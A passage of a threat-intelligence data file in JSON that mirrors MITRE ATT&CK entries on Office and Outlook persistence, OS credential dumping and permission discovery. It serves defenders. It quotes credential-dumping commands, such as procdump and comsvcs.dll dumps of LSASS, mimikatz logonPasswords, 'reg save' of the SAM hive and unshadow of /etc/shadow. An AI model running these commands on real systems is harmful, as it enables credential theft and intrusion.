"description": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. <sup>[[Microsoft Change Normal Template](https://app.tidalcyber.com/references/76bf3ce1-b94c-4b3d-9707-aca8a1ae5555)]</sup>\n\nOffice Visual Basic for Applications (VBA) macros <sup>[[MSDN VBA in Office](https://app.tidalcyber.com/references/9c44416d-1f3d-4d99-b497-4615ed6f5546)]</sup> can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.<sup>[[enigma0x3 normal.dotm](https://app.tidalcyber.com/references/b8339d48-699d-4043-8197-1f0435a8dca5)]</sup><sup>[[Hexacorn Office Template Macros](https://app.tidalcyber.com/references/7d558a35-a5c0-4e4c-92bf-cb2435c41a95)]</sup> Shared templates may also be stored and pulled from remote locations.<sup>[[GlobalDotName Jun 2019](https://app.tidalcyber.com/references/f574182a-5d91-43c8-b560-e84a7e941c96)]</sup> \n\nWord Normal.dotm location:<br>\n<code>C:\\Users\\&lt;username&gt;\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm</code>\n\nExcel Personal.xlsb location:<br>\n<code>C:\\Users\\&lt;username&gt;\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB</code>\n\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under <code>C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\</code>, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.<sup>[[GlobalDotName Jun 2019](https://app.tidalcyber.com/references/f574182a-5d91-43c8-b560-e84a7e941c96)]</sup> \n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1137.001"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "83a2facf-84e7-4a3c-9dcd-74c4fd33fec6",
"value": "Office Template Macros"
},
{
"description": "Adversaries may abuse the Microsoft Office \"Office Test\" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.<sup>[[Hexacorn Office Test](https://app.tidalcyber.com/references/60d90852-ea00-404d-b613-9ad1589aff31)]</sup><sup>[[Palo Alto Office Test Sofacy](https://app.tidalcyber.com/references/3138f32c-f89c-439c-a8c5-2964c356308d)]</sup>\n\nThere exist user and global Registry keys for the Office Test feature:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Office test\\Special\\Perf</code>\n\nAdversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1137.002"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "62c22cc4-5643-4679-a6ae-9f6a3147d2fe",
"value": "Office Test"
},
{
"description": "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.<sup>[[SensePost Outlook Forms](https://app.tidalcyber.com/references/5d91a713-2f05-43bd-9fef-aa3f51f4c45a)]</sup>\n\nOnce malicious forms have been added to the users mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.<sup>[[SensePost Outlook Forms](https://app.tidalcyber.com/references/5d91a713-2f05-43bd-9fef-aa3f51f4c45a)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1137.003"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "6fe2a6b8-bfb3-431d-8156-b2d005096f90",
"value": "Outlook Forms"
},
{
"description": "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.<sup>[[SensePost Outlook Home Page](https://app.tidalcyber.com/references/d2758a4b-d326-45a7-9ebf-03efcd1832da)]</sup>\n\nOnce malicious home pages have been added to the users mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.<sup>[[SensePost Outlook Home Page](https://app.tidalcyber.com/references/d2758a4b-d326-45a7-9ebf-03efcd1832da)]</sup>\n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1137.004"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "12d918e0-51f7-45cf-b67c-fa60d15599f2",
"value": "Outlook Home Page"
},
{
"description": "Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.<sup>[[SilentBreak Outlook Rules](https://app.tidalcyber.com/references/a2ad0658-7c12-4f58-b7bf-6300eacb4a8f)]</sup>\n\nOnce malicious rules have been added to the users mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.<sup>[[SilentBreak Outlook Rules](https://app.tidalcyber.com/references/a2ad0658-7c12-4f58-b7bf-6300eacb4a8f)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1137.005"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "d595e757-da2e-4430-95d6-81f7d69738e8",
"value": "Outlook Rules"
},
{
"description": "Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.\n\nA variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.<sup>[[SensePost Ruler GitHub](https://app.tidalcyber.com/references/aa0a1508-a872-4e69-bf20-d3c8202f18c1)]</sup> These persistence mechanisms can work within Outlook or be used through Office 365.<sup>[[TechNet O365 Outlook Rules](https://app.tidalcyber.com/references/c7f9bd2f-254a-4254-8a92-a3ab02455fcb)]</sup>",
"meta": {
"platforms": [
"Office 365",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "ecca6c85-3d18-40c0-84d0-d5fb7ebd72b5",
"type": "similar"
},
{
"dest-uuid": "83a2facf-84e7-4a3c-9dcd-74c4fd33fec6",
"type": "similar"
},
{
"dest-uuid": "62c22cc4-5643-4679-a6ae-9f6a3147d2fe",
"type": "similar"
},
{
"dest-uuid": "6fe2a6b8-bfb3-431d-8156-b2d005096f90",
"type": "similar"
},
{
"dest-uuid": "12d918e0-51f7-45cf-b67c-fa60d15599f2",
"type": "similar"
},
{
"dest-uuid": "d595e757-da2e-4430-95d6-81f7d69738e8",
"type": "similar"
}
],
"uuid": "db846575-a79b-4403-870d-5842be82001d",
"value": "Office Application Startup"
},
{
"description": "Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.<sup>[[Microsoft - Cached Creds](https://app.tidalcyber.com/references/590ea63f-f800-47e4-8d39-df11a184ba84)]</sup>\n\nOn Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.<sup>[[PassLib mscache](https://app.tidalcyber.com/references/ce40e997-d04b-49a6-8838-13205c54243a)]</sup> The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1) to recover the plaintext password.<sup>[[ired mscache](https://app.tidalcyber.com/references/5b643e7d-1ace-4517-88c2-96115cac1209)]</sup>\n\nWith SYSTEM access, the tools/utilities such as [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16), [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532), and secretsdump.py can be used to extract the cached credentials.\n\nNote: Cached credentials for Windows Vista are derived using PBKDF2.<sup>[[PassLib mscache](https://app.tidalcyber.com/references/ce40e997-d04b-49a6-8838-13205c54243a)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1003.005"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "cf4d8bb4-2d60-499d-b72c-4957660758c9",
"value": "Cached Domain Credentials"
},
{
"description": "Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)<sup>[[Microsoft DRSR Dec 2017](https://app.tidalcyber.com/references/43b75a27-7875-4c24-b04d-54e1b60f3028)]</sup> <sup>[[Microsoft GetNCCChanges](https://app.tidalcyber.com/references/410570e4-b578-4838-a25d-f03d92fcf3cb)]</sup> <sup>[[Samba DRSUAPI](https://app.tidalcyber.com/references/79e8f598-9962-4124-b884-eb10f86885af)]</sup> <sup>[[Wine API samlib.dll](https://app.tidalcyber.com/references/d0fdc669-959c-42ed-be5d-386a4e90a897)]</sup> to simulate the replication process from a remote domain controller using a technique called DCSync.\n\nMembers of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data<sup>[[ADSecurity Mimikatz DCSync](https://app.tidalcyber.com/references/61b0bb42-2ed6-413d-b331-0a84df12a87d)]</sup> from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://app.tidalcyber.com/technique/12efebf8-9da4-446c-a627-b6f95524f1ea) for use in [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a)<sup>[[Harmj0y Mimikatz and DCSync](https://app.tidalcyber.com/references/2afa76c1-caa1-4f16-9289-7abc7eb3a102)]</sup> or change an account's password as noted in [Account Manipulation](https://app.tidalcyber.com/technique/65f7482c-485b-4fd7-80f5-0ec6e923ac4d).<sup>[[InsiderThreat ChangeNTLM July 2017](https://app.tidalcyber.com/references/3bf24c68-fc98-4143-9dff-f54030c902fe)]</sup>\n\nDCSync functionality has been included in the \"lsadump\" module in [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16).<sup>[[GitHub Mimikatz lsadump Module](https://app.tidalcyber.com/references/e188ff4d-a983-4f5a-b9e1-3b0f9fd8df25)]</sup> Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.<sup>[[Microsoft NRPC Dec 2017](https://app.tidalcyber.com/references/05cf36a3-ff04-4437-9209-376e9f27c009)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1003.006"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "0a54e0f9-27eb-466b-ae47-53216e6e8065",
"value": "DCSync"
},
{
"description": "Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.<sup>[[Linux Password and Shadow File Formats](https://app.tidalcyber.com/references/7c574609-4b0d-44e7-adc3-8a3d67e10e9f)]</sup>\n\nThe Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:<sup>[[nixCraft - John the Ripper](https://app.tidalcyber.com/references/5e093b21-8bbd-4ad4-9fe2-cbb04207f1d3)]</sup> <code># /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>\n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1003.008"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "ef7732d9-b629-4037-b5b5-579dafda080b",
"value": "/etc/passwd and /etc/shadow"
},
{
"description": "Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.<sup>[[Passcape LSA Secrets](https://app.tidalcyber.com/references/64b0e13f-de5f-4964-bcfa-bb0f6206383a)]</sup><sup>[[Microsoft AD Admin Tier Model](https://app.tidalcyber.com/references/3afba81a-3b1d-41ec-938e-24f055698d52)]</sup><sup>[[Tilbury Windows Credentials](https://app.tidalcyber.com/references/2ddae0c9-910c-4c1a-b524-de3a58dbba13)]</sup> LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets</code>. LSA secrets can also be dumped from memory.<sup>[[ired Dumping LSA Secrets](https://app.tidalcyber.com/references/cf883397-11e9-4f94-977a-bbe46e3107f5)]</sup>\n\n[Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) can be used to extract from the Registry. [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16) can be used to extract secrets from memory.<sup>[[ired Dumping LSA Secrets](https://app.tidalcyber.com/references/cf883397-11e9-4f94-977a-bbe46e3107f5)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1003.004"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "b40aa9fa-abb5-47c3-951f-2d454b9bc017",
"value": "LSA Secrets"
},
{
"description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) using [Use Alternate Authentication Material](https://app.tidalcyber.com/technique/28f65214-95c1-4a72-b385-0b32cbcaea8f).\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* <code>procdump -ma lsass.exe lsass_dump</code>\n\nLocally, mimikatz can be run using:\n\n* <code>sekurlsa::Minidump lsassdump.dmp</code>\n* <code>sekurlsa::logonPasswords</code>\n\nBuilt-in Windows tools such as comsvcs.dll can also be used:\n\n* <code>rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID lsass.dmp full</code><sup>[[Volexity Exchange Marauder March 2021](https://app.tidalcyber.com/references/ef0626e9-281c-4770-b145-ffe36e18e369)]</sup><sup>[[Symantec Attacks Against Government Sector](https://app.tidalcyber.com/references/f5940cc2-1bbd-4e42-813a-f50867b01035)]</sup>\n\n\nWindows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages</code> and <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.<sup>[[Graeber 2014](https://app.tidalcyber.com/references/f2f9a6bf-b4d9-461e-b961-0610ea72faf0)]</sup>\n\nThe following SSPs can be used to access credentials:\n\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.<sup>[[TechNet Blogs Credential Protection](https://app.tidalcyber.com/references/88367099-df19-4044-8c9b-2db4c9f418c4)]</sup>\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\n* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.<sup>[[TechNet Blogs Credential Protection](https://app.tidalcyber.com/references/88367099-df19-4044-8c9b-2db4c9f418c4)]</sup>\n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1003.001"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "ab0da102-5a14-42b1-969e-5d3daefdf0c5",
"value": "LSASS Memory"
},
{
"description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\\NTDS\\Ntds.dit</code> of a domain controller.<sup>[[Wikipedia Active Directory](https://app.tidalcyber.com/references/924e1186-57e5-43db-94ab-29afa3fdaa7b)]</sup>\n\nIn addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.<sup>[[Metcalf 2015](https://app.tidalcyber.com/references/1c899028-466c-49b0-8d64-1a954c812508)]</sup>\n\nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1003.003"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "c46432d4-bdeb-4dad-bbbd-68ad8ba6aca5",
"value": "NTDS"
},
{
"description": "Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the processs virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the processs virtual address space.<sup>[[Picus Labs Proc cump 2022](https://app.tidalcyber.com/references/e8a50a79-6ca4-5c91-87ad-0b1ba9eca505)]</sup><sup>[[baeldung Linux proc map 2022](https://app.tidalcyber.com/references/b70d04e4-c5f9-5cb2-b896-9bd64e97369e)]</sup>\n\nWhen executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the processs memory.<sup>[[MimiPenguin GitHub May 2017](https://app.tidalcyber.com/references/b10cd6cc-35ed-4eac-b213-110de28f33ef)]</sup><sup>[[Polop Linux PrivEsc Gitbook](https://app.tidalcyber.com/references/a73a2819-61bd-5bd2-862d-5eeed344909f)]</sup>\n\nIf running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1003.007"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "81ae71ff-ca5e-4b87-9361-24ebc2c454b3",
"value": "Proc Filesystem"
},
{
"description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.\n\nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe\n* [gsecdump](https://app.tidalcyber.com/software/5ffe662f-9da1-4b6f-ad3a-f296383e828c)\n* [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with Reg:\n\n* <code>reg save HKLM\\sam sam</code>\n* <code>reg save HKLM\\system system</code>\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes.<sup>[[GitHub Creddump7](https://app.tidalcyber.com/references/276975da-7b5f-49aa-975e-4ac9bc527cf2)]</sup>\n\nNotes: \n\n* RID 500 account is the local, built-in administrator.\n* RID 501 is the guest account.\n* User accounts start with a RID of 1,000+.\n",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1003.002"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "a95e33ab-7032-4943-ab15-d526420e0cc6",
"value": "Security Account Manager"
},
{
"description": "Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) and access restricted information.\n\nSeveral of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "cf4d8bb4-2d60-499d-b72c-4957660758c9",
"type": "similar"
},
{
"dest-uuid": "0a54e0f9-27eb-466b-ae47-53216e6e8065",
"type": "similar"
},
{
"dest-uuid": "ef7732d9-b629-4037-b5b5-579dafda080b",
"type": "similar"
},
{
"dest-uuid": "b40aa9fa-abb5-47c3-951f-2d454b9bc017",
"type": "similar"
},
{
"dest-uuid": "ab0da102-5a14-42b1-969e-5d3daefdf0c5",
"type": "similar"
},
{
"dest-uuid": "c46432d4-bdeb-4dad-bbbd-68ad8ba6aca5",
"type": "similar"
},
{
"dest-uuid": "81ae71ff-ca5e-4b87-9361-24ebc2c454b3",
"type": "similar"
},
{
"dest-uuid": "a95e33ab-7032-4943-ab15-d526420e0cc6",
"type": "similar"
}
],
"uuid": "368f85f9-2b15-4732-80fe-087694eaf34d",
"value": "OS Credential Dumping"
},
{
"description": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as <code>net accounts (/domain)</code>, <code>Get-ADDefaultDomainPasswordPolicy</code>, <code>chage -l <username></code>, <code>cat /etc/pam.d/common-password</code>, and <code>pwpolicy getaccountpolicies</code> <sup>[[Superuser Linux Password Policies](https://app.tidalcyber.com/references/c0bbc881-594a-408c-86a2-211ce6279231)]</sup> <sup>[[Jamf User Password Policies](https://app.tidalcyber.com/references/aa3846fd-a307-4be5-a487-9aa2688d5816)]</sup>. Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to discover password policy information (e.g. <code>show aaa</code>, <code>show aaa common-criteria policy all</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>\n\nPassword policies can be discovered in cloud environments using available APIs such as <code>GetAccountPasswordPolicy</code> in AWS <sup>[[AWS GetPasswordPolicy](https://app.tidalcyber.com/references/dd44d565-b9d9-437e-a31a-a52c6a21e3b3)]</sup>.",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "2bf2e498-99c8-4e36-ad4b-e675d95ac925",
"value": "Password Policy Discovery"
},
{
"description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.<sup>[[Peripheral Discovery Linux](https://app.tidalcyber.com/references/427b3a1b-88ea-4027-bae6-7fb45490b81d)]</sup><sup>[[Peripheral Discovery macOS](https://app.tidalcyber.com/references/2a3c5216-b153-4d89-b0b1-f32af3aa83d0)]</sup> Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "0997d871-875e-41e4-891c-f8a4ed8b2f31",
"value": "Peripheral Device Discovery"
},
{
"description": "Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.\n\nWith authenticated access there are several tools that can be used to find permissions groups. The <code>Get-MsolRole</code> PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts <sup>[[Microsoft Msolrole](https://app.tidalcyber.com/references/e36f4e3a-61c9-4fdc-98de-d51a2b3b4865)]</sup><sup>[[GitHub Raindance](https://app.tidalcyber.com/references/321bba10-06c6-4c4f-a3e0-318561fa0fed)]</sup>.\n\nAzure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command <code>az ad user get-member-groups</code> will list groups associated to a user account for Azure while the API endpoint <code>GET https://cloudidentity.googleapis.com/v1/groups</code> lists group resources available to a user for Google.<sup>[[Microsoft AZ CLI](https://app.tidalcyber.com/references/cfd94553-272b-466b-becb-3859942bcaa5)]</sup><sup>[[Black Hills Red Teaming MS AD Azure, 2018](https://app.tidalcyber.com/references/48971032-8fa2-40ff-adef-e91d7109b859)]</sup><sup>[[Google Cloud Identity API Documentation](https://app.tidalcyber.com/references/67f2719e-74fd-4bc1-9eeb-07d3095a5191)]</sup> In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.<sup>[[Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022](https://app.tidalcyber.com/references/af755ba2-97c2-5152-ab00-2e24740f69f3)]</sup>\n\nAdversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS <code>GetBucketAcl</code> API <sup>[[AWS Get Bucket ACL](https://app.tidalcyber.com/references/1eddbd32-8314-4f95-812a-550904eac2fa)]</sup>. Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1069.003"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "9e366f99-7f7d-4407-8915-448a8108c7e0",
"value": "Cloud Groups"
},
{
"description": "Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n\nCommands such as <code>net group /domain</code> of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level groups.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1069.002"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "f14bb7ae-6ba3-4b44-b776-c79867ea9225",
"value": "Domain Groups"
},
{
"description": "Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n\nCommands such as <code>net localgroup</code> of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, <code>dscl . -list /Groups</code> on macOS, and <code>groups</code> on Linux can list local groups.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1069.001"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "0fa8230a-fd97-4e2c-9923-923044af4291",
"value": "Local Groups"
},
{
"description": "Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.\n\nAdversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.<sup>[[CrowdStrike BloodHound April 2018](https://app.tidalcyber.com/references/fa99f290-e42c-4311-9f6d-c519c9ab89fe)]</sup>",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
},
{
"dest-uuid": "9e366f99-7f7d-4407-8915-448a8108c7e0",
"type": "similar"
},
{
"dest-uuid": "f14bb7ae-6ba3-4b44-b776-c79867ea9225",
"type": "similar"
},
{
